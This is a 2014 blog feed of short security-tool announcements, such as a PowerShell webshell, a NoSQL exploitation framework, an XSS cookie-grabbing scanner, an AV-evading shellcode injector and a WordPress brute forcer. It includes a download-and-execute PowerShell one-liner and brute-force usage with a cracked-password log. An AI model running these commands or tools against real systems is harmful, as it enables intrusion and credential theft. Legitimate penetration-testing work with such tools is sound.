OWASP Mantra Security Toolkit - Browser Based Security Framework

June 9, 2014, 1:52 pm

≫ Next: Moo0 File Monitor - Monitor file access easily

≪ Previous: Xenotix xBOT - A Cross Platform PoC Bot that abuse certain Google Services to implement it's C&C

OWASP Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.

Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.

Mantra is a browser especially designed for web application security testing. By having such a product, more people will come to know the easiness and flexibility of being able to follow basic testing procedures within the browser. Mantra believes that having such a portable, easy to use and yet powerful platform can be helpful for the industry.

Mantra has many built in tools to modify headers, manipulate input strings, replay GET/POST requests, edit cookies, quickly switch between multiple proxies, control forced redirects etc. This makes it a good software for performing basic security checks and sometimes, exploitation. Thus, Mantra can be used to solve basic levels of various web.

Mantra Provides

A web application security testing framework built on top of a browser.
Supports Windows, Linux(both 32 and 64 bit) and Macintosh.
Can work with other software like ZAP using built in proxy management function which makes it much more convenient.
Available in 9 languages: Arabic, Chinese – Simplified, Chinese – Traditional, English, French, Portuguese, Russian, Spanish and Turkish
Comes installed with major security distributions including BackTrack and Matriux

Download OWASP Mantra

↧

Moo0 File Monitor - Monitor file access easily

June 9, 2014, 6:58 pm

≫ Next: Antak WebShell - A webshell which utilizes PowerShell

≪ Previous: OWASP Mantra Security Toolkit - Browser Based Security Framework

Moo0 File Monitor lets you easily monitor the file access activities on your system.

Have you ever wondered what's going on with your disk system behind your watch? Why the disk is busy? What's scratching your HDD? You may find them out using this simple program.

Download Moo0 File Monitor

↧

Antak WebShell - A webshell which utilizes PowerShell

June 10, 2014, 2:10 pm

≫ Next: Nosql-Exploitation-Framework - A FrameWork For NoSQL Scanning and Exploitation Framework

≪ Previous: Moo0 File Monitor - Monitor file access easily

Antak is a webshell written in C#.Net which utilizes powershell. Antak is a part of Nishang and updates could be found here: https://github.com/samratashok/nishang

Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind while using commands (like changing current directory or running session aware scripts).

Executing PowerShell scripts on the target -

Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
By uploading the script to the target and executing it.
Make the script a semi-colon separated one-liner.

Files can be uploaded and downloaded using the respective buttons.

Uploading a file - To upload a file you must mention the actual path on server (with write permissions) in command textbox. (OS temporary directory like C:\Windows\Temp may be writable.) Then use Browse and Upload buttons to upload file to that path.

Downloading a file - To download a file enter the actual path on the server in command textbox. Then click on Download button.

Main Features:

Upload a file
Download a file
Executing Scripts
Remoting/Pivoting

Download Antak WebShell

↧

Nosql-Exploitation-Framework - A FrameWork For NoSQL Scanning and Exploitation Framework

June 10, 2014, 3:15 pm

≫ Next: XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation

≪ Previous: Antak WebShell - A webshell which utilizes PowerShell

A FrameWork For NoSQL Scanning, Enumeration and Exploitation.

NoSQL Databases are schema less databases. They were invented to store data easily and flexibly.

NoSQL Databases have gained popularity and its security has always been under the scanner.

The NoSQL Exploitation Framework focuses scanning,enumerating and exploiting these databases.

The tool has support for over 5 databases MongoDB,CouchDB,Redis,H-Base and Cassandra.

Added Features:

First Ever Tool With Added Support For Mongo,Couch,Redis,H-Base,Cassandra
Support For NoSQL WebAPPS
Added payload list for JS Injection,Web application Enumeration.
Scan Support for Mongo,CouchDB and Redis
Dictionary Attack Support for Mongo,Cocuh and Redis
Enumeration Module added for the DB's,retrieves data in db's @ one shot.
Currently Discover's Web Interface for Mongo
Shodan Query Feature
MultiThreaded IP List Scanner
Dump and Copy Database features Added for CouchDB
Sniff for Mongo,Couch and Redis

Installation

Run chmod+x install.sh nosqlmap.py
./install.sh
nosqlexp.py -h (For Help Options)

Sample Usage

nosqlexp.py -ip localhost -scan
nosqlexp.py -ip localhost -dict mongo -file b.txt
nosqlexp.py -ip localhost -enum couch
nosqlexp.py -ip localhost -enum redis
nosqlexp.py -ip localhost -clone couch
nosqlexp.py -ip localhost -webapp "web_app_link"

Download Nosql-Exploitation-Framework

↧

XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation

June 11, 2014, 6:14 am

≫ Next: DarunGrim - A Patch Analysis and Binary Diffing Tool

≪ Previous: Nosql-Exploitation-Framework - A FrameWork For NoSQL Scanning and Exploitation Framework

XSSYA work by execute the payload encoded to bypass Web Application Firewall which is the first method request and response if it respond 200 it turn to Method 2 which search that payload decoded in web page HTML code if it confirmed get the last step which is execute document.cookie to get the cookie

XSSYA Features

* Support HTTPS

* After Confirmation (execute payload to get cookies)

* Can be run in (Windows - Linux)

* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG IP)

*XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall)

* Support Saving The Web HTML Code Before Executing

the Payload Viewing the Web HTML Code into the Screen or Terminal

Download XSSYA

↧

DarunGrim - A Patch Analysis and Binary Diffing Tool

June 11, 2014, 2:27 pm

≫ Next: PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

≪ Previous: XSSYA - Cross Site Scripting Scanner & Vulnerability Confirmation

DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality.

Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers.

This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers.

Download DarunGrim

↧

PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

June 11, 2014, 3:09 pm

≫ Next: Shellter - A Dynamic ShellCode Injector

≪ Previous: DarunGrim - A Patch Analysis and Binary Diffing Tool

PAExec lets you launch Windows programs on remote Windows computers without needing to install software on the remote computer first. For example, you could launch CMD.EXE remotely and have the equivalent of a terminal session to the remote server. PAExec is useful for doing remote installs, checking remote configuration, etc.

PAExec - The Redistributable PsExec

Microsoft's PsExec tool (originally by SysInternal's Mark Russinovich) is a favorite of system administrators everywhere. It just has two tiny flaws:

PsExec can not be redistributed
Sensitive command-line options like username and passwords are sent as clear text

We needed something that would overcome those two issues, and not finding a suitable replacement, decided to write our own.

Examples

PAExec \\{server IP address} -s cmd.exe

Creates a telnet-like session on the remote server, running as Local System.

PAExec \\{server IP address} ipconfig

View network configuration on the remote server without needing to do an RDP session.

PAExec \\{server IP address} -u {username} -p {password} -i -c MyApp.exe

Copy MyApp.exe to the remote server and run it as {username} so that it shows up on the remote server.

Download PAExec

↧

Shellter - A Dynamic ShellCode Injector

June 12, 2014, 1:13 pm

≫ Next: HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files

≪ Previous: PAExec - The Redistributable PsExec (Launch Remote Windows Apps)

Shellter is a dynamic shellcode injection tool, and probably the first dynamic PE infector ever created.

It can be used in order to inject shellcode into native Windows applications (currently 32-bit apps only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.

Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections, adding an extra section with RWE access,and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application.

Click here to read more.

Download Shellter

↧

HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files

June 12, 2014, 3:15 pm

≫ Next: YASAT - Yet Another Stupid Audit Tool

≪ Previous: Shellter - A Dynamic ShellCode Injector

HashMyFiles is small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. You can easily copy the MD5/SHA1 hashes list into the clipboard, or save them into text/html/xml file.

HashMyFiles can also be launched from the context menu of Windows Explorer, and display the MD5/SHA1 hashes of the selected file or folder.

Using HashMyFiles

HashMyFiles doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file (HashMyFiles.exe).

After you run it, you can add files and folders that you want to view their MD5/SHA1 hashes. You can do it by using the 'Add File' and 'Add Folder' options under the File menu, or simply by draging the files and folder from Explorer into the main window of HashMyFiles.

After adding the desired files, you can copy the MD5/SHA1 hashes to the clipboard, or save the hashes list into text/html/xml file.

Download HashMyFiles

↧

YASAT - Yet Another Stupid Audit Tool

June 13, 2014, 1:19 pm

≫ Next: Passive Spider - Information Gathering from Search Engine Tool

≪ Previous: HashMyFiles - Calculate MD5/SHA1/CRC32 hashes of your files

YASAT (Yet Another Stupid Audit Tool) is a simple stupid audit tool.

Its goal is to be as simple as possible with minimum binary dependencies (only sed, grep and cut)

Second goal is to document each test with maximum information and links to official documentation.

It do many tests for checking security configuration issue or others good practice.

It checks many software configurations like:

Apache
Bind DNS
CUPS
PHP
kernel configuration
mysql
network configuration
openvpn
Packages update
samba
snmpd
squid
syslog
tomcat
user accounting
vsftpd
xinetd

YASAT is licensed under GPLv3

Download YASAT

↧

Passive Spider - Information Gathering from Search Engine Tool

June 13, 2014, 2:39 pm

≫ Next: Hooker - Automated Dynamic Analysis of Android Applications

≪ Previous: YASAT - Yet Another Stupid Audit Tool

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.

INSTALL
git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing, refer to them for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.

ARGUMENTS

--domain   || -d    The domain you would like to use as a target.
--pages    || -p    The number of pages you would like to hit from the search engine. Default: 10
--all      || -a    Do all of the spidering checks. This is the default check.
--allpages          Find all pages related to the domain, limited by the --pages option.
--allfiles          Find all file types related to the domain, limited to the ones configured.
--neighbours        Find other domains that are on the same IP address.
--urlkeywords       Find page URLs that have 'interesting' keywords in them.
--keywords          Find page content that have 'interesting' keywords in them.
--export   || -e    Request URLs through proxy.
                    Specify a proxy (type://ip:port) or use defaults. Default: http://127.0.0.1:8080
--help     || -h    This output.

USAGE

- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours

Download Passive Spider

↧

Hooker - Automated Dynamic Analysis of Android Applications

June 14, 2014, 1:43 pm

≫ Next: Windows Autologin Password Dumper & Manager v2.0

≪ Previous: Passive Spider - Information Gathering from Search Engine Tool

Hooker is an opensource project for dynamic analysis of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. It leverages Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an elasticsearch database. A set of python scripts can be used to automatize the execution of an analysis in order to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:

APK-instrumenter is an Android application that must be installed prior to the analysis on an Android device (for instance, an emulator).
hooker_xp is a python tool that can be use to control the android device and trigger the installation and stimulation of an application on it.
hooker_analysis is a python script that can be use to collect results stored in the elasticsearch database.
tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact informations.
tools/apk_retriever is a Python tool that can be use to download APKs from various online public Android markets.
tools/emulatorCreator is a script that can be use to prepare an emulator.

Download Hooker

↧

Windows Autologin Password Dumper & Manager v2.0

June 15, 2014, 9:22 am

≫ Next: Automater v2.0 - URL/Domain, IP Address, and Md5 Hash OSINT Tool

≪ Previous: Hooker - Automated Dynamic Analysis of Android Applications

Windows Autologin Password is the free command-line tool to quickly dump and manage the Windows Automatic Logon Password.

Automatic Logon is one of the useful feature in Windows which allows you to login to system automatically without entering the password everytime. This tool helps you to easily dump the current Autologon password as well as quickly change the Autologon settings with just one command.
Here is the complete list of things that you can do with it,

Dump the Windows Auto Logon User & Password
Enable the Windows Auto Logon
Specify your Username & Password for Windows Auto Logon.
Disable the Windows Auto Logon

Once you set the Auto Logon username & password, you have to restart and next time you will be logged in automatically.
It is simple & easy to use tool. Also being a command-line based tool makes it perfect for automation.

'Windows Autologin Password' works on both both 32 bit & 64 bit versions and tested successfully on all Windows Platforms starting from Windows XP to latest version, Windows 8.

Download Windows Autologin Password v2.0

↧

Automater v2.0 - URL/Domain, IP Address, and Md5 Hash OSINT Tool

June 15, 2014, 9:30 am

≫ Next: wpbf - WordPress Brute Force

≪ Previous: Windows Autologin Password Dumper & Manager v2.0

Automater is a URL/Domain, IP Address, and Md5 Hash OSINT tool aimed at making the analysis process easier for intrusion Analysts. Given a target (URL, IP, or HASH) or a file full of targets Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal.

*Automater is installed on HoneyDrive and Kali by default but currently have an outdated version.

Installation:

Automater comes in two flavors, python script that will work for Linux or Windows, and an exe for Windows.

Windows:

The Windows client is currently in development. In the meantime the python code will work on Windows with a python 2.7 install

Linux:

As this is a python script you will need to ensure you have the correct version of python, which for this script is python 2.7. I used mostly standard libraries, but just incase you don't have them, here are the libraries that are required: httplib2,re,sys,argparse,urllib,urllib2

With the python and the libraries out of the way, you can simply use git to clone the tekdefense code to your local machine.

git clone https://github.com/1aN0rmus/TekDefense-Automater.git

Usage:
Once installed the usage is pretty much the same across Windows, Linux, and Kali.

python Automater.py -h

or if you chmod +x Automater.py you can



    ./Automater.py -h

    usage: Automater.py [-h] [-o OUTPUT] [-w WEB] [-c CSV] [-d DELAY] [-s SOURCE]

                        [--p]

                        target



    IP, URL, and Hash Passive Analysis tool



    positional arguments:

      target                List one IP Addresses, URL or Hash to query or pass

                            the filename of a file containing IP Addresses, URL or

                            Hash to query each separated by a newline.



    optional arguments:

      -h, --help            show this help message and exit

      -o OUTPUT, --output OUTPUT

                            This option will output the results to a file.

      -w WEB, --web WEB     This option will output the results to an HTML file.

      -c CSV, --csv CSV     This option will output the results to a CSV file.

      -d DELAY, --delay DELAY

                            This will change the delay to the inputted seconds.

                            Default is 2.

      -s SOURCE, --source SOURCE

                            This option will only run the target against a

                            specific source engine to pull associated domains.

                            Options are defined in the name attribute of the site

                            element in the XML configuration file

      --p                   This option tells the program to post information to

                            sites that allow posting. By default the program will

                            NOT post to sites that require a post.

Download Automater v2.0

↧

wpbf - WordPress Brute Force

June 16, 2014, 1:54 pm

≫ Next: ArchAssault - Arch Linux ISO for Penetration Testers

≪ Previous: Automater v2.0 - URL/Domain, IP Address, and Md5 Hash OSINT Tool

The script will try to login into the WordPress dashboard through the login form using a mixture of enumerated usernames, a wordlist and relevant keywords from the blog's content. If a single username is given, the script will not search for additional usernames.

When a correct username/passwords matchs, it will be logged and show on the standard output.

For faster results you can spawn threads but BE CAREFULL not to flood/DoS the site. Default settings can be changed in "config.py" and "logging.conf" files.

The wordlist must have one entry per line, a small wordlist (wordlist.txt) and plugin list (plugins.txt) are provided for testing purposes.

Features

Username enumeration and detection (TALSOFT-2011-0526, Author's archive page and content parsing)
Threads
Use keywords from blog's content in the wordlist
HTTP Proxy Support
Basic WordPress fingerprint (version and full path)
Advance plugins fingerprint (bruteforce, discovery and version/documentation)
Detection of Login LockDown plugin (this plugin makes the bruteforce useless)
Advanced logging using Python's logging library and logging configuration file

Usage

Basic

In this example, wpbf will do a bruteforce test using the default settings (you can change the default settings in config.py). It will enumerate usernames, find keywords and plugins, use the static+generated wordlist to bruteforce each user and try to guess remote path:

$ ./wpbf.py http://localhost/wordpress/
2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/
2012-02-26 14:26:18,844 - INFO - Checking URL and username...
2012-02-26 14:26:18,845 - INFO - Enumerating users...
2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest
2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested
2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested
2012-02-26 14:26:55,369 - INFO - Starting workers...
2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.1
2012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/
2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found
2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)
221 tasks left / 2.1 tasks per second / 1.76min left
199 tasks left / 2.2 tasks per second / 1.51min left
172 tasks left / 2.7 tasks per second / 1.06min left
21 tasks left / 1.6 tasks per second / 0.22min left
2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php

Username enumeration only

The '-eu' or '--enumerateusers' parameter will only do username enumeration and list the usernames found

$ ./wpbf.py -eu http://www.mysite.com/blog/

Aggresive

You can spawn more threads to speed up the bruteforce process. Be aware that using a lot of threads can cause hangs in the server or denial of service. For this example we will spawn 23 threads:

$ ./wpbf.py -t 23 http://www.mysite.com/blog/

Custom

Using username 'john', not using keywords in the blog content for the wordlist and trough a local proxy:

$ ./wpbf.py --nokeywords -u john -p http://localhost:8008/ http://www.mysite.com/blog/

Download wpbf

↧

ArchAssault - Arch Linux ISO for Penetration Testers

June 16, 2014, 4:55 pm

≫ Next: Remote DLL - Simple & Free Tool to Inject or Remove DLL from Remote Process

≪ Previous: wpbf - WordPress Brute Force

The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages, these packages are unmodified from their upstream source.

While our Arch Linux base is primarily untouched, there are times were we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.

Download ArchAssault

↧

Remote DLL - Simple & Free Tool to Inject or Remove DLL from Remote Process

June 17, 2014, 1:43 pm

≫ Next: Wireless Network Watcher - Show who is connected to your wireless network

≪ Previous: ArchAssault - Arch Linux ISO for Penetration Testers

RemoteDLL is the simple tool to Inject DLL or Remove DLL from Remote Process. It is based on popular Dll Injection technique.

It supports following DLL Injection methods

CreateRemoteThread
NtCreateThread [Good for DLL Injection across sessions on Vista/Windows 7]
QueueUseAPC [Delayed Injection]

Removing DLLor Freeing DLL from Process is the unique feature of RemoteDLL. It can help you to instantly remove DLL from target process completely.

Now a days, many Malware & Spyware programs use the DLL Injection technique to hide themselves into legitimte system process. Once injected there is no way to remove such DLL other than killing the process itself.

In such situations, RemoteDLL can help you to remove these Malicious DLLs from the target process easily.

Current mega version supports Injecting DLL and Removing DLL from 64 bit process along with numerous improvements for Windows 8.

Download RemoteDLL

↧

Wireless Network Watcher - Show who is connected to your wireless network

June 18, 2014, 2:58 pm

≫ Next: HackPorts - Mac OS X Penetration Testing Framework and Tools

≪ Previous: Remote DLL - Simple & Free Tool to Inject or Remove DLL from Remote Process

Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.

For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.

You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.

Download Wireless Network Watcher

↧

HackPorts - Mac OS X Penetration Testing Framework and Tools

June 19, 2014, 2:50 pm

≫ Next: WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet

≪ Previous: Wireless Network Watcher - Show who is connected to your wireless network

HackPorts was developed as a penetration testing framework with accompanying tools and exploits that run natively on Mac platforms. HackPorts is a ‘super-project’ that leverages existing code porting efforts, security professionals can now use hundreds of penetration tools on Mac systems without the need for Virtual Machines.

Tool List:

0trace
3proxy
Air – Automated Image Installer
Android APK Tool
Android SDK Framework
Apache Users
Autospy
BLINDELEPHANT
BRAA
Bed
Beef
Binwalk
Btdsd
CHKRootKit
CHNTPwd
Casefile – Maltego
Cewl
Cisc0wn
Cisco Scanner (ciscos)
Cisco Torch
Cisco global exploiter
Credump
Creepy
Crunch
Cupp
CutyCapt
DBD (Durandal’s Backdoor)
DDSquat
DD_Rescue
DHCPig
DNSChef
DNSMAP
DNSRECON
DNSTRACER
DNmap
DPScan
DarkStat
DavTest
DeD
DerogDom
DirBuster
Dozer (Formally Mercury)
Droidbox
Encryption Wizard
EvilGrade
ExifTool
Exiting the Social-Engineer Toolkit (SET)
ExploitDB
FIERCE2
FTester
Fast-Track
Flasm
GoldenEye
Golismero
Grabber
Grendle Scan
HIOC
HashTag
Hashcat-utils
Hexinject
IAXFlood
IDAPro-Free
Intersect
Inundator
JBoss-Autopwn
JD – Java Decompiler
JavaLOIC.jar
John
Johnny
Joomscan
Kautilya
Killerbee
Kismac2
Laudanum
Libhijack
Linux Exploit Suggester
Lynis
MagicTree
MaskGen
Metagoofil
Mork.pl
Multimac
Netdiscover
Netifera
Nikto
ONESIXYONE
OWASP Mantra
OllyDbg – Debugger
OpenVas
OphCrack
Padbuster
Passdb
Patator

Patator
PdfBook
PeachFuzz
Phrasen | Drescher
Powerfuzzer
Pyrit
RFIDIOt
RSMangler
Rebind
Rec-Studio
ReverseRaider
SCTPScan
SFUZZ
SIPARMYKNIFE
SMBExec
SMTP-USER-ENUM
SNMPCheck
SPAMHole
SQLLHF
SSLCaudit
SSLSniff
SSLStrip
SUCrack
Samdump
Sipcrack
Skipfish
Smali
Smartphone-Pentest-Framework
StatProcessor
TCPReplay
TLSSLed
TWOFI
TestDisk
TestSSL
ToolName
Truecrack
UAtester
UBERHARVEST
Unicornscan
Uniscan
Vega
Vinetto
Volatility
W3af
WCE – Windows Credential Editor
WIFITap
WOL-E
WPScan
Waffit
Wapiti
Web Backdoor Compilation (wbc)
Webscrab – OWASP
Webshag
Webslayer
Whatweb
XSpy
acccheck
adsnmp
aircrack-ng
artemisa
asp-audit.pl ASP Auditor
automater
bbqsql
bluediving
bluelog
bluemaho
bluepot
blueranger
bt-attacks
burpsuite
c07-sip-r2.jar
cdpsnarf
cisco-auditing-tool
cmospwd
cms-explorer
copy-router-config
cymothoa
darkMySQLi
dbpwaudit
deBlaze
dedected
dex2jar
dirb
dns2tcpc
dnsenum
dotdotpwn
easy-creds
enumIAX
evtparse.pl Parse Event log (Win2000, XP, 2003)
fierce
fimap
findmyhash.py
getsids

giskismet
goofile
goohost
gooscan
hack library
hash_id.py – Hash Identifer
hashcat
hexorbase
htexploit
httprint
httsquash
iWar
impacket-examples
intercepter-ng
iodine
iphoneanalyzer
ipv6toolset
jigsaw
keimpx.py
lanmap2
lbd – load balancing detector
letdown
make-pdf-javascript.py
manglefizz
mdb-export
merge-router-config
miranda
mitmproxy
mopest-2.pl
netgear-telnetenable
nimbostratus
oat (Oracle Auditing Tool)
ocs (OCS Cisco Scanner)
oscanner
packetstorm
pdf-parser
pdfid.py
pdgmail
peePDF
phrasenoia
pipal
plecost
pompem
powersploit
pref – Parse contents of XP/Vista Prefetch files/directory
proxystrike
ptunnel
pwnat
pytbull
rcracki_mt
redfang – the bluetooth hunter
revealertoolkit
rtpflood
rtpinject
rtpinsertsound
rtpmixsound
samdump2
sapyto – SAP Penetration Testing Framework
sidguesser
sipp
sipscan
sipvicious
spooftooph
sqlbrute
sqldict
sqlmap
sqlninja
sqlscan
sqlsus
sslyze
swaks – Swiss Army Knife for SMTP
tftp brute force
thcsslcheck
theHarvester
thebackdoorfactory
tnscmdlOg
trixd00r
u3-pwn
udp.pl – UDP Flood
udptunnel
unix-priv-check
untidy – XML Fuzzer
voiphoney
volafox
warvox
websecurify
websploit
weevely
wfuzz
xsser
yersinia
zaproxy – OWAS Zap

Download HackPorts

↧

WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet

June 20, 2014, 4:53 pm

≫ Next: Hexorbase - Multiple Database Management and Audit Tool

≪ Previous: HackPorts - Mac OS X Penetration Testing Framework and Tools

WebSiteSniffer is a packet sniffer tool that captures all Web site files downloaded by your Web browser while browsing the Internet, and stores them on your hard drive under the base folder that you choose. WebSiteSniffer allows you to choose which type of Web site files will be captured: HTML Files, Text Files, XML Files, CSS Files, Video/Audio Files, Images, Scripts, and Flash (.swf) files.

While capturing the Web site files, the main window of WebSiteSniffer displays general statistics about the downloaded files for every Web site / host name, including the total size of all files (compressed and uncompressed) and total number of files for every file type (HTML, Text, Images, and so on)

Download WebSiteSniffer v1.41

↧